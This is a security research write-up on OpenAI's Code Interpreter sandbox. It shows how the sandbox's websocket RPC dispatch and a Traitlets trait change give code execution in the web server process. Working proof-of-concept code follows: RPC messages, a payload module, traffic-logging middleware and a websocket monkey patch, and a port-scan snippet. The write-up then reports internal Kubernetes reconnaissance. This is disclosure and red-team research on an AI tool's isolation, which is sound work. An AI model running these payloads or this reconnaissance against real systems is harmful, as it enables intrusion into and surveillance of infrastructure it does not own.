Ryan Govostes

The OpenAI Code Interpreter

Background

OpenAI introduced Code Interpreter at OpenAI DevDay 2023 as a tool that assistants such as ChatGPT can invoke "to run code iteratively to solve challenging code and math problems."

The announcement notes that Python code is executed in a "sandboxed execution environment." In June 2024, in a post expanding on the security of its compute infrastructure, OpenAI noted:

For some higher-risk tasks we use gVisor, a container runtime that provides additional isolation. This defense-in-depth approach ensures robust security and efficient management of workloads.

Executing user-controlled Python code is rightfully considered a "higher-risk task" and hence the Code Interpreter's "user machine" environment runs on top of gVisor, which provides significant isolation from the host cluster node. (This can be confirmed by asking the assistant to report the output of the dmesg command.)

But how, exactly, is the sandbox structured? What mechanism handles code execution and to what extent is it further isolated? To answer these questions, we will look more closely at the Code Interpreter environment.

Vulnerability

The container is launched with the entrypoint /home/sandbox/.openai-internal/user_machine/run-server.sh, which runs exec tini -- python3 -m uvicorn --host 0.0.0.0 --port 8080 user_machine.app:app. This spawns a Python web server as PID 3, hosting the user_machine application built on the FastAPI framework on port 8080.

The application's web API endpoints are the interface by which systems external to the container—for example, cluster monitoring services and the assistant itself—can query or modify the state of the container.

For example, the /check_liveness endpoint is likely used by Kubernetes health checks, and the /upload and /download endpoints are likely used when the assistant ferries user files between the sandbox and the ChatGPT frontend.

[!NOTE]
OpenAI's code is unobfuscated, but comments have been stripped. In lieu of the source files, by default FastAPI serves an OpenAPI spec at /openapi.json containing a listing of endpoints and their parameter types.
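
For instance, from inside the sandbox the endpoint listing can be dumped with a few lines of Python (a sketch; it assumes the server is reachable at localhost:8080, which the proof-of-concept below confirms):

import json
import urllib.request

# Fetch the auto-generated OpenAPI spec and list the declared endpoints
with urllib.request.urlopen('http://localhost:8080/openapi.json') as resp:
    spec = json.load(resp)

for path, methods in spec['paths'].items():
    print(path, sorted(methods))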

A particularly important endpoint is /channel, which is the websocket API over which user code is received and results are passed back out. The application does not execute code directly; instead, it manages several Jupyter kernel subprocesses which are used for out-of-process code evaluation.

Websocket clients control these kernels using remote procedure calls. The design may be inspired by solutions like Jupyter Kernel Gateway, although it appears to be a bespoke implementation. For certain objects, the application allows the client to call any method with arbitrary, JSON-serializable arguments. (The return value is sent back if it, too, is serializable.) The logic is approximately:

@app.websocket("/channel")
async def channel(websocket: WebSocket):
    request = unpack_message(await websocket.receive_text())
    if request.message_type == "call_request":
        # Resolve the "object reference" to a live server-side object
        if request.object_reference.type == "multi_kernel_manager":
            target = _MULTI_KERNEL_MANAGER
        elif request.object_reference.type == "kernel_manager":
            target = _MULTI_KERNEL_MANAGER.get_kernel(request.object_reference.id)
        # elif ...

        # Dispatch any method name with client-supplied arguments
        value = getattr(target, request.method)(*request.args, **request.kwargs)
        send_reply(request_id=request.request_id, value=value)

By passing the multi_kernel_manager "object reference", we can call arbitrary methods on the global AsyncMultiKernelManager instance. In the following example, we invoke AsyncMultiKernelManager.list_kernel_ids(). The returned identifiers could be passed back to the websocket API with a kernel_manager object reference to invoke, say, KernelManager.shutdown_kernel() on a particular instance.

import asyncio
import json
import websockets

# RPC request invoking list_kernel_ids() on the global kernel manager
message = json.dumps({
    'message_type': 'call_request',
    'object_reference': {'type': 'multi_kernel_manager', 'id': ''},
    'request_id': '06e03bbe-5fb1-41a0-b4f1-33e1d0445ad8',
    'method': 'list_kernel_ids',
    'args': [],
    'kwargs': {},
})

async def main():
    uri = 'ws://localhost:8080/channel'
    async with websockets.connect(uri) as websocket:
        await websocket.send(message)
        print(await websocket.recv())  # call_return_value containing the kernel IDs

asyncio.run(main())
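
Reusing the same script, a follow-up request could then target one of the returned kernels through a kernel_manager object reference. A sketch (the id value is a placeholder for an identifier returned by the previous call):

# Hypothetical follow-up message; 'id' must be a kernel ID from list_kernel_ids()
message = json.dumps({
    'message_type': 'call_request',
    'object_reference': {'type': 'kernel_manager', 'id': '<kernel-id>'},
    'request_id': '0a6a28a8-0000-4000-8000-000000000000',
    'method': 'shutdown_kernel',
    'args': [],
    'kwargs': {},
})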

Notably, methods are invoked within the execution context of the application itself, not the Jupyter kernels. This raises the question of whether the RPC dispatch mechanism can be abused to execute arbitrary code within the application process, beyond the seemingly limited API surface of the kernel manager classes.

The AsyncMultiKernelManager class, in the Jupyter codebase, follows the factory method pattern for creating new KernelManager instances:

class AsyncMultiKernelManager(LoggingConfigurable):
    # ...
    kernel_manager_class = DottedObjectName(
        "jupyter_client.ioloop.AsyncIOLoopKernelManager",
        config=True,
        help="""The kernel manager class.  This is configurable to allow
        subclassing of the AsyncKernelManager for customized behavior.
        """,
    )

    @observe("kernel_manager_class")
    def _kernel_manager_class_changed(self, change: t.Any) -> None:
        self.kernel_manager_factory = self._create_kernel_manager_factory()

The implementation uses the Traitlets framework in two ways: First, it declares the factory class as a trait attribute, which can be configured at runtime using Traitlets' configuration machinery. Second, it "observes" the trait attribute and recreates the factory whenever the class changes.

To use trait attributes, AsyncMultiKernelManager subclasses traitlets.HasTraits and hence inherits the set_trait(name, value) method. This can be invoked through the RPC service to replace the kernel manager class and trigger the recreation of the factory.
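
As a standalone illustration of this Traitlets behavior (example code of ours, not from either codebase), set_trait() fires the observer synchronously:

from traitlets import HasTraits, Unicode, observe

class Demo(HasTraits):
    kernel_manager_class = Unicode('jupyter_client.ioloop.AsyncIOLoopKernelManager')

    @observe('kernel_manager_class')
    def _changed(self, change):
        # Runs immediately whenever the trait is assigned a new value
        print(f"changed: {change['old']!r} -> {change['new']!r}")

Demo().set_trait('kernel_manager_class', 'payload.AsyncIOLoopKernelManager')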

Careful readers will note that kernel_manager_class is string-like, not a class reference. The implementation of _create_kernel_manager_factory() uses a utility function from Traitlets to import the named class from its containing module:

def _create_kernel_manager_factory(self) -> t.Callable:
    kernel_manager_ctor = import_item(self.kernel_manager_class)
    # ...

Therefore, by calling AsyncMultiKernelManager.set_trait("kernel_manager_class", "...") with the name of a Python module, it's possible to trigger the import of that module and hence execute arbitrary code within the web server process.
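
This behavior can be reproduced locally, outside the sandbox (a sketch assuming jupyter_client is installed; the module name is a deliberately non-existent placeholder):

from jupyter_client.multikernelmanager import AsyncMultiKernelManager

mkm = AsyncMultiKernelManager()
# The observer fires on assignment and recreates the factory, which
# eagerly imports the named module via traitlets' import_item()
mkm.set_trait('kernel_manager_class', 'does_not_exist.KernelManager')
# -> ModuleNotFoundError: No module named 'does_not_exist'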

For example, we can create /home/sandbox/.local/lib/python3.11/site-packages/payload.py to place a new module on Python's search path:

import os

# Re-export the real kernel manager class so that the dotted name
# payload.AsyncIOLoopKernelManager still resolves to a working implementation
from jupyter_client.ioloop.manager import AsyncIOLoopKernelManager

# Module-level code runs at import time, inside the web server process
with open('/home/sandbox/flag', 'w') as f:
    f.write(f'Hello world -- my PID is {os.getpid()}')

Then, we modify the call_request in our earlier proof-of-concept to invoke set_trait() with the factory class trait and a reference to our new payload module:

message = json.dumps({
    'message_type': 'call_request',
    'object_reference': {'type': 'multi_kernel_manager', 'id': ''},
    'request_id': '06e03bbe-5fb1-41a0-b4f1-33e1d0445ad8',
    'method': 'set_trait',
    'args': ['kernel_manager_class', 'payload.AsyncIOLoopKernelManager'],
    'kwargs': {},
})

Afterwards, the assistant will confirm that /home/sandbox/flag contains the string Hello world -- my PID is 3, demonstrating that the code executed within the web server process, not within a Jupyter kernel.

Exploitation

It is reasonable to ask what this code execution as PID 3 gains us. After all, the entire point of this sandbox is to execute arbitrary user code, and the web server process does not hold secrets or higher privileges. What we can now do is intercept traffic to the web server to reveal additional details of Code Interpreter and OpenAI's Kubernetes cluster.

To do so, we inject new middleware to log requests to a file. We also monkey patch the websocket handler to log messages sent and received.

import datetime
import sys

# Re-exported so this module can be loaded via the kernel_manager_class trick
from jupyter_client.ioloop.manager import AsyncIOLoopKernelManager
from starlette.middleware.base import BaseHTTPMiddleware
from starlette.responses import Response
from starlette.websockets import WebSocket

LOG = open('/home/sandbox/log.txt', 'w')

# Install middleware for logging HTTP requests
async def spy_middleware(request, call_next):
    log = {
        'timestamp': datetime.datetime.now().isoformat(),
        'url': str(request.url),
        'method': request.method,
        'client': request.scope.get('client', ()),
        'request': {
            'headers': dict(request.headers),
            'body': await request.body(),
        },
    }
    try:
        response = await call_next(request)
        body = b''.join([chunk async for chunk in response.body_iterator])
        log['response'] = {
            'status': response.status_code,
            'header': dict(response.headers),
            'body': body,
        }
        return Response(
            content=body,
            status_code=response.status_code,
            headers=dict(response.headers),
            media_type=response.media_type,
        )
    except Exception as e:
        log['exception'] = str(e)
        raise
    finally:
        print(log, file=LOG, flush=True)

app = sys.modules['user_machine.app'].app
app.middleware_stack = BaseHTTPMiddleware(app.middleware_stack, spy_middleware)

# Monkey patch WebSocket class to log traffic
WebSocket.__receive, WebSocket.__send = WebSocket.receive, WebSocket.send

async def websocket_spy_recv(self, *args, **kwargs):
    msg = await self.__receive(*args, **kwargs)
    print({
        'timestamp': datetime.datetime.now().isoformat(),
        'client': self.scope.get('client', ()),
    } | msg, file=LOG, flush=True)
    return msg

async def websocket_spy_send(self, msg, *args, **kwargs):
    print({
        'timestamp': datetime.datetime.now().isoformat(),
        'client': self.scope.get('client', ()),
    } | msg, file=LOG, flush=True)
    return await self.__send(msg, *args, **kwargs)

WebSocket.receive, WebSocket.send = websocket_spy_recv, websocket_spy_send

Traffic Analysis

To generate traffic, I sent the assistant several prompts intended to exercise the Code Interpreter tool and its data analysis features, which include client-side rendering of tables and charts.

Request Patterns

There are a few distinct request patterns visible in our log.

In one, the client simply requests a list of running kernels and checks that one is still alive:

<-- method call: multi_kernel_manager.list_kernel_ids()
--> return: ["07d617d8-2845-46...", "42ce8593-1c1b-48...", "90b7f586-8db4-40..."]
<-- method call: multi_kernel_manager.get_kernel("07d617d8-2845-46...")
--> object reference: kernel_manager
<-- method call: kernel_manager.is_alive()
--> return: true

A more complex pattern involves asking a kernel to execute code. The peer registers itself as a client of a particular kernel and connects the kernel's ZeroMQ messaging channels to the websocket. The kernel's output is broadcast over these channels and relayed back to the peer.

<-- method call: multi_kernel_manager.get_kernel("07d617d8-2845-46...")
--> object reference: kernel_manager
<-- register_activity_request
<-- method call: kernel_manager.client()
--> object reference: client
<-- method call: client.start_channels()
--> return: null
<-- method call: client.wait_for_ready(timeout=15.0)
--> return: null
<-- method call: client.execute("# Read the conte...", silent=false, store_history=true, allow_stdin=false)
--> return: "6d9fb2db-cc8887c..."
<-- method call: client.get_iopub_msg(timeout=59.83647584915161)
--> return: {
  "message_type": "call_return_value",
  "request_id": "d430f3cf-418d-4902-a518-16e1dab7d8fe",
  "value": {
    "header": {
      "msg_id": "1231a609-085a1a7212f6f10b67626bae_12_45",
      "msg_type": "status",
      "username": "username",
      "session": "1231a609-085a1a7212f6f10b67626bae",
      "date": "2025-05-15T06:48:57.376542Z",
      "version": "5.3"
    },
    "msg_id": "1231a609-085a1a7212f6f10b67626bae_12_45",
    "msg_type": "status",
    "parent_header": {
      "msg_id": "6d9fb2db-cc8887c847e4a459e3a19ba4_3_1",
      "msg_type": "execute_request",
      "username": "username",
      "session": "6d9fb2db-cc8887c847e4a459e3a19ba4",
      "date": "2025-05-15T06:48:57.374964Z",
      "version": "5.3"
    },
    "metadata": {},
    "content": { "execution_state": "busy" },
    "buffers": []
  }
}

The complexity of these messages makes them an appealing area for future investigation.

Outside of the websocket, we see the expected requests for /check_liveness. Additionally, the /self_identify, /check_file, /download, and /upload endpoints are invoked during inbound and outbound file transfers.

Callbacks

Notably, the kernel can send a callback to the peer using the same RPC interface. Three callbacks are known to us through the ace_tools module within the container. The assistant can inject code, invisible to the end user, like this:

import ace_tools as tools
tools.display_dataframe_to_user(name="A Pandas DataFrame", dataframe=df)

[!NOTE]
The callbacks can be invoked from user-submitted code using ace_tools._call_function(name: str, args: list[Any], kwargs: dict[str, Any]). It is not necessary to run the RPC exploit. Arguments must be JSON serializable.

The three callbacks are:

  • display_dataframe_to_user(path: str, title: str)
  • display_chart_to_user(path: str, title: str, chart_type: str)
  • display_matplotlib_image_to_user(title: str, reason: str, exception_ids: list[str])

To probe whether the remote peer likewise dispatches calls with getattr(tool, request.method)(*request.args, **request.kwargs), one can invoke tool.__dir__() to retrieve a list of attributes. However, this method is rejected, indicating that the peer enforces an allowlist of functions.
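
From user-submitted code, the probe looks like this (a sketch; we only know from our testing that the call is rejected, not the exact failure mode):

import ace_tools as tools

# '__dir__' is not on the peer's allowlist, so this call is rejected
tools._call_function('__dir__', [], {})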

While the path arguments look like appealing attack vectors, the files are read by the user_machine web app running in our sandbox. The remote peer sends a request to the /download/{path} endpoint to retrieve the file, as discussed below.

Further investigation is warranted to discover additional callback methods and probe whether these methods are resistant to malformed parameters.

Network Recon

  • Two liveness checks arrived from 10.130.24.71 with the user agent kube-probe/1.30, exactly 2 minutes apart. This may be the IP address of the cluster node hosting my container's pod.

  • Websocket traffic arrived from various hosts in the 10.128.16.0/20 subnet. This may be the pod subnet, though the exact network range may be larger.

  • The KUBERNETES_SERVICE_HOST environment variable points to the host 10.0.0.1 within the cluster's service CIDR.

  • The DNS configuration in /etc/resolv.conf points to the DNS server at 10.0.0.10, also within the service CIDR. The search domain confirms that we are running on Azure Kubernetes Service and are in the untrusted namespace within the cluster.

  • The network policy appears to prohibit outbound connections. A TCP port scan of each web service client reveals no open ports (a minimal scan sketch follows this list), and the DNS server is likewise unreachable.

  • Numerous Datadog-related headers, for example x-datadog-trace-id, are present in our inbound HTTP requests. This suggests that a proxy or middleware is modifying our traffic. The Datadog headers or this proxy itself may be future attack vectors.
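
The port scan referenced above can be performed from user code with the standard library alone. A sketch (the target address is taken from the liveness checks; the port range is an illustrative assumption):

import socket

# connect() scan of one observed client IP; the port range is illustrative
target = '10.130.24.71'
for port in range(1, 1025):
    with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
        s.settimeout(0.2)
        if s.connect_ex((target, port)) == 0:
            print(f'{target}:{port} open')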

File Transfers

Requests to /check_file, /upload, and /download are preceded by one to /self_identify within the same HTTP connection. All responses include an x-ace-self-identify header with a unique identifier set at provisioning time.

This is likely a safety feature intended to prevent cross-contamination of user data if the application identity changes because the container IP address has been re-used. The client will also abort the operation if the connection is closed after /self_identify, avoiding a potential time-of-check to time-of-use data leak vulnerability.

Prior to downloading a file from the sandbox, an HTTP request is made to the /check_file/{path} API, which returns a response such as:

{
  "message_type": "check_file_response",
  "exists": true,
  "too_large": false,
  "size": 222,
  "user_machine_exists": true
}

The size field must be consistent with the content length of the subsequent /download request.
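
Putting these observations together, the peer's client-side logic plausibly resembles the following. This is a hypothetical reconstruction from the observed traffic, not OpenAI's code; the base URL and file path are placeholders:

import requests

BASE = 'http://sandbox.example:8080'  # placeholder sandbox address
PATH = 'outputs/result.csv'           # placeholder file path

session = requests.Session()  # keep the same HTTP connection throughout

# Pin the machine identity before touching user files
ident = session.get(f'{BASE}/self_identify').headers['x-ace-self-identify']

check = session.get(f'{BASE}/check_file/{PATH}').json()
assert check['exists'] and not check['too_large']

resp = session.get(f'{BASE}/download/{PATH}')
# Abort if the identity changed mid-operation (e.g. a re-used container IP)
assert resp.headers['x-ace-self-identify'] == ident
# The download must be consistent with the size reported by /check_file
assert len(resp.content) == check['size']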

Conclusion

OpenAI’s Code Interpreter sandbox is designed as an untrusted environment to run user code with strong isolation from the rest of their infrastructure. Despite this, our analysis shows that compromising the sandbox’s web application process does allow an attacker to perform valuable reconnaissance on the internal workings of the Code Interpreter tool and its Kubernetes environment.